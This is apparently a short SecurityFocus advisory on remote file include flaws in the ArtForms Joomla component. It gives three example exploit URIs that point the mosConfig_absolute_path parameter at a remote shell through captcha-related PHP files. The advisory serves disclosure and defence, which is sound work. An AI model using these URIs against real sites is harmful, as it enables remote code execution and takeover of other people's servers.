ArtForms Joomla! Component 'mosConfig_absolute_path' Multiple Remote File Include Vulnerabilities

Attackers can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/[path]/components/com_artforms/assets/captcha/includes/captchaform/imgcaptcha.php?mosConfig_absolute_path=*shell
http://www.example.com/[path]/components/com_artforms/assets/captcha/includes/captchaform/mp3captcha.php?mosConfig_absolute_path=*shell
http://www.example.com/[path]/components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=*shell


 

Privacy Statement
Copyright 2010, SecurityFocus